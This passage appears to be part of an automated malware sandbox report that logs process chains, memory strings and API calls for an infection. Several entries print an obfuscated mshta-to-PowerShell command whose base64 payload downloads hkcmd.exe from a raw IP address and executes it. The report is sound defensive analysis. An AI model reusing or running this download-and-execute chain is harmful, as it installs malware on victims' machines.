                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDdWdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI2LjE0My80NDAvaGtjbWQuZXhlIiwiJEVOdjpBUFBEQVRBXGhrY21kLmV4ZSIsMCwwKTtTdEFSdC1TTEVlcCgzKTtJblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcaGtjbWQuZXhlIg=='+[ChAr]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDdWdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI2LjE0My80NDAvaGtjbWQuZXhlIiwiJEVOdjpBUFBEQVRBXGhrY21kLmV4ZSIsMCwwKTtTdEFSdC1TTEVlcCgzKTtJblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcaGtjbWQuZXhlIg=='+[ChAr]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\hkcmd.exe "C:\Users\user\AppData\Roaming\hkcmd.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESDFBA.tmp" "c:\Users\user\AppData\Local\Temp\4jbortuo\CSC8F941E4524844CFB0E06A557A70D099.TMP"Jump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jddwdcagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicbhzgqtvhlqzsagicagicagicagicagicagicagicagicagicagicagic1tru1irxjkrwzptkl0sw9uicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvsbg1vtiisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagigv0sfusc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagquvou0fyy1hldkysc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagafysdwludcagicagicagicagicagicagicagicagicagicagicagie1veixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbqtg1ibgjtbgepoycgicagicagicagicagicagicagicagicagicagicagicattkfnzsagicagicagicagicagicagicagicagicagicagicagicjvvu9wcwltysigicagicagicagicagicagicagicagicagicagicagicattkfnzxnwqwnlicagicagicagicagicagicagicagicagicagicagicagcwraulfivwqgicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjddwddo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zlji2lje0my80ndavagtjbwquzxhliiwijevodjpbufbeqvrbxghry21klmv4zsismcwwktttdefsdc1ttevlccgzkttjblzvs2utsvrlbsagicagicagicagicagicagicagicagicagicagicagicikru52okfquerbvefcagtjbwquzxhlig=='+[char]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jddwdcagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicbhzgqtvhlqzsagicagicagicagicagicagicagicagicagicagicagic1tru1irxjkrwzptkl0sw9uicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvsbg1vtiisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagigv0sfusc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagquvou0fyy1hldkysc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagafysdwludcagicagicagicagicagicagicagicagicagicagicagie1veixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbqtg1ibgjtbgepoycgicagicagicagicagicagicagicagicagicagicagicattkfnzsagicagicagicagicagicagicagicagicagicagicagicjvvu9wcwltysigicagicagicagicagicagicagicagicagicagicagicattkfnzxnwqwnlicagicagicagicagicagicagicagicagicagicagicagcwraulfivwqgicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjddwddo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zlji2lje0my80ndavagtjbwquzxhliiwijevodjpbufbeqvrbxghry21klmv4zsismcwwktttdefsdc1ttevlccgzkttjblzvs2utsvrlbsagicagicagicagicagicagicagicagicagicagicagicikru52okfquerbvefcagtjbwquzxhlig=='+[char]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jddwdcagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicbhzgqtvhlqzsagicagicagicagicagicagicagicagicagicagicagic1tru1irxjkrwzptkl0sw9uicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvsbg1vtiisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagigv0sfusc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagquvou0fyy1hldkysc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagafysdwludcagicagicagicagicagicagicagicagicagicagicagie1veixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbqtg1ibgjtbgepoycgicagicagicagicagicagicagicagicagicagicagicattkfnzsagicagicagicagicagicagicagicagicagicagicagicjvvu9wcwltysigicagicagicagicagicagicagicagicagicagicagicattkfnzxnwqwnlicagicagicagicagicagicagicagicagicagicagicagcwraulfivwqgicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjddwddo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zlji2lje0my80ndavagtjbwquzxhliiwijevodjpbufbeqvrbxghry21klmv4zsismcwwktttdefsdc1ttevlccgzkttjblzvs2utsvrlbsagicagicagicagicagicagicagicagicagicagicagicikru52okfquerbvefcagtjbwquzxhlig=='+[char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jddwdcagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicbhzgqtvhlqzsagicagicagicagicagicagicagicagicagicagicagic1tru1irxjkrwzptkl0sw9uicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvsbg1vtiisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagigv0sfusc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagquvou0fyy1hldkysc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagafysdwludcagicagicagicagicagicagicagicagicagicagicagie1veixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbqtg1ibgjtbgepoycgicagicagicagicagicagicagicagicagicagicagicattkfnzsagicagicagicagicagicagicagicagicagicagicagicjvvu9wcwltysigicagicagicagicagicagicagicagicagicagicagicattkfnzxnwqwnlicagicagicagicagicagicagicagicagicagicagicagcwraulfivwqgicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjddwddo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zlji2lje0my80ndavagtjbwquzxhliiwijevodjpbufbeqvrbxghry21klmv4zsismcwwktttdefsdc1ttevlccgzkttjblzvs2utsvrlbsagicagicagicagicagicagicagicagicagicagicagicikru52okfquerbvefcagtjbwquzxhlig=='+[char]0x22+'))')))"Jump to behavior
                    Source: jy7dhEfPtuBr.exe, 0000000D.00000002.2110374521.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, jy7dhEfPtuBr.exe, 0000000D.00000000.1127993866.0000000000F10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                    Source: jy7dhEfPtuBr.exe, 0000000D.00000002.2110374521.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, jy7dhEfPtuBr.exe, 0000000D.00000000.1127993866.0000000000F10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: jy7dhEfPtuBr.exe, 0000000D.00000002.2110374521.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, jy7dhEfPtuBr.exe, 0000000D.00000000.1127993866.0000000000F10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                    Source: jy7dhEfPtuBr.exe, 0000000D.00000002.2110374521.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, jy7dhEfPtuBr.exe, 0000000D.00000000.1127993866.0000000000F10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,6_2_02F35694
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: GetLocaleInfoA,6_2_02F3A2D8
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: GetLocaleInfoA,6_2_02F3A28C
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,6_2_02F357A0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
